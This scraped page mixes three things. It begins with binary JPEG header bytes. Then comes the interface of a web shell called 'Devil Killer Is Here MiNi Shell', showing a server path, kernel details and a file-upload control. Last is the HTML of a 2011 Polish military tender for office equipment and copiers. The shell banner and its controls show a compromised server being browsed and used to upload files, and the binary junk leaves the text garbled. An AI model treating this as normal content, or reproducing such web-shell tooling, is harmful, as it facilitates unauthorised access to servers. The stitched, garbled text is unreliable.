JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20110523/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20110523/125476-N-2011.html

<p class="kh_header"><b>Dęblin: Dostawa  sprzętu mechanizacji prac biurowych oraz kserokopiarek cyfrowych kolorowych formatu A-3 - Nr 28/11/N</b><br>
<b>Numer ogłoszenia: 125476 - 2011; data zamieszczenia: 23.05.2011</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Jednostka Wojskowa 4219 , 08-521 Dęblin, woj. lubelskie, tel. 0-81 5519510, 5517818, faks 0-81 5519536.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.5wog.wp.mil.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: Jednostka Wojskowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostawa  sprzętu mechanizacji prac biurowych oraz kserokopiarek cyfrowych kolorowych formatu A-3 - Nr 28/11/N.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> GRUPA I, II  Sprzęt mechanizacji prac biurowych
1. Przedmiotem zamówienia jest jednorazowa dostawa sprzętu mechanizacji prac biurowych na potrzeby Jednostki Wojskowej Nr 4219 w Dęblinie. Szczegółowo przedmiot zamówienia został określony poniżej, a także w załączniku Nr 1 do siwz tj. formularzu ofertowym. Oferowany przedmiot zamówienia winien spełniać co najmniej funkcje i parametry przedstawione poniżej oraz w załączniku nr 1 do siwz - określone jako parametry graniczne.
2. Dostawa   sprzętu nastąpi jednorazowo  w terminie 20  dni od dnia podpisania umowy.  
3. Wykonawca zobowiązuje się dostarczyć sprzęt na własny koszt i niebezpieczeństwo do magazynu służby uzbrojenia - wskazanego przez Zamawiającego znajdującego się na terenie Jednostki Wojskowej Nr 4219 w Dęblinie - po uzgodnieniu terminu dostawy z upoważnioną osobą.
4. Z tytułu załadunku, transportu i rozładunku sprzętu Wykonawcy nie przysługuje odrębne wynagrodzenie.
5. Ryzyko związane z dostarczeniem przedmiotu umowy oraz jego utratą lub uszkodzeniem, przechodzi na Zamawiającego z chwilą zakończenia rozładunku i podpisania protokołu odbioru. Odbiór przedmiotu dostawy nastąpi w obecności przedstawiciela Wykonawcy przez komisję powołaną przez Dowódcę JW 4219.
6. Dostarczony sprzęt musi być oryginalny, fabrycznie nowy, nie poddawany naprawie, regeneracji ani renowacji.
7. Okres gwarancji na dostarczony sprzęt będzie nie krótszy niż jeden rok poczynając od dnia dokonania odbioru. Serwis pogwarancyjny na terenie całego kraju przez okres minimum 5 lat. 
W okresie gwarancyjnym bezpłatne przeglądy serwisowe co 6 miesięcy u Użytkownika sprzętu. Naprawy pogwarancyjne opłacane będą wg cenników krajowych w polskiej walucie PLN.
8.Wykonawca zobowiązuje się wraz z dostawą przedmiotu umowy do dostarczenia kart gwarancyjnych.
9. Dostarczona dokumentacja eksploatacyjno-techniczna musi być sporządzona w języku polskim.

GRUPA III Kserokopiarki cyfrowe formatu A-3

1.Przedmiotem zamówienia jest jednorazowa dostawa 2 szt. kserokopiarek cyfrowych kolorowych formatu A-3 na potrzeby wyposażenia Centrum Szkolenia Inżynieryjno-Lotniczego w Dęblinie. Szczegółowo przedmiot zamówienia został określony poniżej, a także w załączniku Nr 1 do siwz tj. formularzu ofertowym. Oferowany przedmiot zamówienia winien spełniać co najmniej funkcje 
i parametry przedstawione poniżej oraz w załączniku nr 1 do siwz - określone jako parametry graniczne.

2. W skład zestawu urządzeń wchodzą:
- kserokopiarka cyfrowa kolorowa format A-3,
- oprogramowanie.
 Wymagania eksploatacyjno - techniczne
- kserokopiarka cyfrowa kolorowa format A-3 z funkcją drukowania, kopiowania, skanowania.
Informacje ogólne i wspólne dla poszczególnych opcji
- automatyczny podajnik dokumentów: nie mniej niż 70 arkuszy
- format papieru: od A6 do A3
- gramatura papieru: minimalny zakres 64 - 256 g/m2
- pojemność zasobników na papier:
kaset (szuflad): nie mniej niż 1000 arkuszy;
podajnika bocznego nie mniej niż 100 arkuszy.
- urządzenie wyposażone w moduł automatycznego duplexu (automatyczny druk dwustronny)
- skala szarości: nie mniej niż 256 poziomów
- maksymalna szybkość drukowania/kopiowania A4 (w czerni/w kolorze): nie mniej niż 20/20 str./min.
- panel operatora w języku polskim
- skalowanie: od 25% do 400%, co 0,1%
- karta Ethernet, USB 2.0
- pamięć: nie mniej niż 1 GB

Specyfikacja drukarki
- rozdzielczość drukowania: nie mniejsza niż 600 x 600 dpi
- interfejs: co najmniej Ethernet, USB 2.0
- pamięć: nie mniej niż 1 GB
- sterownik drukarki: Windows Vista/2000/XP/Server 2003
- język opisu strony: PCL 5c/XL, PCL6c, XPS, Postscript 3

Specyfikacja kopiarki
- rozdzielczość kopiowania: nie mniejsza niż 600 x 600 dpi
- pamięć: nie mniej niż 1 GB
- kopiowanie wielokrotne: od 1 do 999 str. 

Specyfikacja skanera
- rozdzielczość kopiowania: nie mniejsza niż 300 x 300 dpi
- prędkość skanowania: nie mniej niż 20 str./min.
- formaty plików: co najmniej JPEG, TIFF, PDF, Compact PDF, Encrypted PDF, XPS, Compact XPS
- tryb skanowania co najmniej:
TWAIN scan,
skanowanie do skrzynki użytkownika,
skanowanie do FTP,
skanowanie SMB,
skanowanie do e-mail.


Dodatkowe wymagania
- instrukcja obsługi w języku polskim,
- gwarancja minimum 36 miesięcy,
- minimum 4 letni serwis pogwarancyjny,
- zabezpieczenie w części zamienne,
- serwis na terenie całego kraju. 

3. Wykonawca dostarczy artykuły w całości oryginalne, fabrycznie nowe, posiadające nienaruszone cechy pierwotnego produktu. 
4.Wykonawca zobowiązuje się dostarczyć wszystkie artykuły w terminie 20 dni od dnia złożenia pisemnego zamówienia, nie później niż do 30.09.2011 r.  
5. Artykuły przeznaczone dla Zamawiającego Wykonawca zobowiązuje się dostarczyć do jego siedziby, tj. Jednostka Wojskowa 4219 w Dęblinie, do wskazanego magazynu, własnym transportem lub za pośrednictwem dowolnie wybranego przewoźnika na własny koszt.
6. Z tytułu załadunku, transportu i rozładunku artykułów Wykonawcy nie przysługuje odrębne wynagrodzenie. 
7. Wykonawca na dostarczone artykuły udziela 3 - letniej gwarancji,  co nie wyklucza dłuższych gwarancji udzielanych przez producenta. Okres gwarancji liczony jest od daty odbioru przez Zamawiającego. Wszelkie koszty związane z wykonaniem obowiązków gwarancyjnych ponosi Wykonawca. Jeżeli Wykonawca wymaga szczególnego trybu zgłaszania reklamacji, to powinien określić to w kartach gwarancyjnych.

Dla wszystkich grup I, II, III
Wykonawca obowiązuje się do wystawienia oddzielnych faktur VAT dla poszczególnych grup I, II, III
Zamawiający zastrzega sobie w toku badania ofert możliwość wezwania wykonawcy do przedstawienia próbek, opisów, fotografii, w celu potwierdzenia, że oferowane dostawy odpowiadają wymaganiom określonym przez zamawiającego..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 30.10.00.00-0, 30.12.14.30-6.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 3.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> .</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wniesienia wadium</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełniania przez wykonawców ww warunku dokonana będzie zgodnie z formułą spełnia - nie spełnia na podstawie treści złożonego oświadczenia w trybie art.22 ust.1 pzp (załącznik nr 2 do siwz)</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełniania przez wykonawców ww warunku dokonana będzie zgodnie z formułą spełnia - nie spełnia na podstawie treści złożonego oświadczenia w trybie art.22 ust.1 pzp (załącznik nr 2 do siwz)</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełniania przez wykonawców ww warunku dokonana będzie zgodnie z formułą spełnia - nie spełnia na podstawie treści złożonego oświadczenia w trybie art.22 ust.1 pzp (załącznik nr 2 do siwz)</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełniania przez wykonawców ww warunku dokonana będzie zgodnie z formułą spełnia - nie spełnia na podstawie treści złożonego oświadczenia w trybie art.22 ust.1 pzp (załącznik nr 2 do siwz)</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełniania przez wykonawców ww warunku dokonana będzie zgodnie z formułą spełnia - nie spełnia na podstawie treści złożonego oświadczenia w trybie art.22 ust.1 pzp (załącznik nr 2 do siwz)</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
</li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li style="margin-right: 20px;"><p class="justify"><span class="bold">III.4.3.2)</span> zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert - albo oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio miejsca zamieszkania osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, jeżeli w miejscu zamieszkania osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się takiego zaświadczenia</p></li></ul>
<br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY , USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane dostawy, usługi lub roboty budowlane odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;">próbki, opisy lub fotografie</li>

</ul>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>nie</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.5wog.wp.mil.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Jednostka Wojskowa Nr 4219, Lotnisko budynek 205, pok.4, 08-521 Dęblin lub pocztą po wpłacie 13,00 zł na konto 86101013390000971391500000. Pisemną prośbę należy przesłać łącznie z dowodem wpłaty.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 31.05.2011 godzina 12:00, miejsce: Kancelaria Jawna (pok. nr 20) Jednostki Wojskowej Nr 4219, Lotnisko bud.205, 08-521 Dęblin.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Dostawa  sprzętu mechanizacji prac biurowych.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1. Przedmiotem zamówienia jest jednorazowa dostawa sprzętu mechanizacji prac biurowych na potrzeby Jednostki Wojskowej Nr 4219 w Dęblinie. Szczegółowo przedmiot zamówienia został określony poniżej, a także w załączniku Nr 1 do siwz tj. formularzu ofertowym. Oferowany przedmiot zamówienia winien spełniać co najmniej funkcje i parametry przedstawione poniżej oraz w załączniku nr 1 do siwz - określone jako parametry graniczne.
2. Dostawa   sprzętu nastąpi jednorazowo  w terminie 20  dni od dnia podpisania umowy.  
3. Wykonawca zobowiązuje się dostarczyć sprzęt na własny koszt i niebezpieczeństwo do magazynu służby uzbrojenia - wskazanego przez Zamawiającego znajdującego się na terenie Jednostki Wojskowej Nr 4219 w Dęblinie - po uzgodnieniu terminu dostawy z upoważnioną osobą.
4. Z tytułu załadunku, transportu i rozładunku sprzętu Wykonawcy nie przysługuje odrębne wynagrodzenie.
5. Ryzyko związane z dostarczeniem przedmiotu umowy oraz jego utratą lub uszkodzeniem, przechodzi na Zamawiającego z chwilą zakończenia rozładunku i podpisania protokołu odbioru. Odbiór przedmiotu dostawy nastąpi w obecności przedstawiciela Wykonawcy przez komisję powołaną przez Dowódcę JW 4219.
6. Dostarczony sprzęt musi być oryginalny, fabrycznie nowy, nie poddawany naprawie, regeneracji ani renowacji.
7. Okres gwarancji na dostarczony sprzęt będzie nie krótszy niż jeden rok poczynając od dnia dokonania odbioru. Serwis pogwarancyjny na terenie całego kraju przez okres minimum 5 lat. 
W okresie gwarancyjnym bezpłatne przeglądy serwisowe co 6 miesięcy u Użytkownika sprzętu. Naprawy pogwarancyjne opłacane będą wg cenników krajowych w polskiej walucie (PLN).
8.Wykonawca zobowiązuje się wraz z dostawą przedmiotu umowy do dostarczenia kart gwarancyjnych.
9. Dostarczona dokumentacja eksploatacyjno-techniczna musi być sporządzona w języku polskim..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 30.10.00.00-0.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 20.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Dostawa  sprzętu mechanizacji prac biurowych.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1. Przedmiotem zamówienia jest jednorazowa dostawa sprzętu mechanizacji prac biurowych na potrzeby Jednostki Wojskowej Nr 4219 w Dęblinie. Szczegółowo przedmiot zamówienia został określony poniżej, a także w załączniku Nr 1 do siwz tj. formularzu ofertowym. Oferowany przedmiot zamówienia winien spełniać co najmniej funkcje i parametry przedstawione poniżej oraz w załączniku nr 1 do siwz - określone jako parametry graniczne.
2. Dostawa   sprzętu nastąpi jednorazowo  w terminie 20  dni od dnia podpisania umowy.  
3. Wykonawca zobowiązuje się dostarczyć sprzęt na własny koszt i niebezpieczeństwo do magazynu służby uzbrojenia - wskazanego przez Zamawiającego znajdującego się na terenie Jednostki Wojskowej Nr 4219 w Dęblinie - po uzgodnieniu terminu dostawy z upoważnioną osobą.
4. Z tytułu załadunku, transportu i rozładunku sprzętu Wykonawcy nie przysługuje odrębne wynagrodzenie.
5. Ryzyko związane z dostarczeniem przedmiotu umowy oraz jego utratą lub uszkodzeniem, przechodzi na Zamawiającego z chwilą zakończenia rozładunku i podpisania protokołu odbioru. Odbiór przedmiotu dostawy nastąpi w obecności przedstawiciela Wykonawcy przez komisję powołaną przez Dowódcę JW 4219.
6. Dostarczony sprzęt musi być oryginalny, fabrycznie nowy, nie poddawany naprawie, regeneracji ani renowacji.
7. Okres gwarancji na dostarczony sprzęt będzie nie krótszy niż jeden rok poczynając od dnia dokonania odbioru. Serwis pogwarancyjny na terenie całego kraju przez okres minimum 5 lat. 
W okresie gwarancyjnym bezpłatne przeglądy serwisowe co 6 miesięcy u Użytkownika sprzętu. Naprawy pogwarancyjne opłacane będą wg cenników krajowych w polskiej walucie (PLN).
8.Wykonawca zobowiązuje się wraz z dostawą przedmiotu umowy do dostarczenia kart gwarancyjnych.
9. Dostarczona dokumentacja eksploatacyjno-techniczna musi być sporządzona w języku polskim..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 30.10.00.00-0.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 20.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Dostawa kserokopiarek cyfrowych kolorowych formatu A-3.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.Przedmiotem zamówienia jest jednorazowa dostawa 2 szt. kserokopiarek cyfrowych kolorowych formatu A-3 na potrzeby wyposażenia Centrum Szkolenia Inżynieryjno-Lotniczego w Dęblinie. Szczegółowo przedmiot zamówienia został określony poniżej, a także w załączniku Nr 1 do siwz tj. formularzu ofertowym. Oferowany przedmiot zamówienia winien spełniać co najmniej funkcje 
i parametry przedstawione poniżej oraz w załączniku nr 1 do siwz - określone jako parametry graniczne.

2. W skład zestawu urządzeń wchodzą:
- kserokopiarka cyfrowa kolorowa format A-3,
- oprogramowanie.
 Wymagania eksploatacyjno - techniczne
- kserokopiarka cyfrowa kolorowa format A-3 z funkcją drukowania, kopiowania, skanowania.
Informacje ogólne i wspólne dla poszczególnych opcji
- automatyczny podajnik dokumentów: nie mniej niż 70 arkuszy
- format papieru: od A6 do A3
- gramatura papieru: minimalny zakres 64 - 256 g/m2
- pojemność zasobników na papier:
kaset (szuflad): nie mniej niż 1000 arkuszy;
podajnika bocznego nie mniej niż 100 arkuszy.
- urządzenie wyposażone w moduł automatycznego duplexu (automatyczny druk dwustronny)
- skala szarości: nie mniej niż 256 poziomów
- maksymalna szybkość drukowania/kopiowania A4 (w czerni/w kolorze): nie mniej niż 20/20 str./min.
- panel operatora w języku polskim
- skalowanie: od 25% do 400%, co 0,1%
- karta Ethernet, USB 2.0
- pamięć: nie mniej niż 1 GB


Specyfikacja drukarki
- rozdzielczość drukowania: nie mniejsza niż 600 x 600 dpi
- interfejs: co najmniej Ethernet, USB 2.0
- pamięć: nie mniej niż 1 GB
- sterownik drukarki: Windows Vista/2000/XP/Server 2003
- język opisu strony: PCL 5c/XL, PCL6c, XPS, Postscript 3

Specyfikacja kopiarki
- rozdzielczość kopiowania: nie mniejsza niż 600 x 600 dpi
- pamięć: nie mniej niż 1 GB
- kopiowanie wielokrotne: od 1 do 999 str. 

Specyfikacja skanera
- rozdzielczość kopiowania: nie mniejsza niż 300 x 300 dpi
- prędkość skanowania: nie mniej niż 20 str./min.
- formaty plików: co najmniej JPEG, TIFF, PDF, Compact PDF, Encrypted PDF, XPS, Compact XPS
- tryb skanowania co najmniej:
TWAIN scan,
skanowanie do skrzynki użytkownika,
skanowanie do FTP,
skanowanie SMB,
skanowanie do e-mail.
Dodatkowe wymagania
- instrukcja obsługi w języku polskim,
- gwarancja minimum 36 miesięcy,
- minimum 4 letni serwis pogwarancyjny,
- zabezpieczenie w części zamienne,
- serwis na terenie całego kraju. 
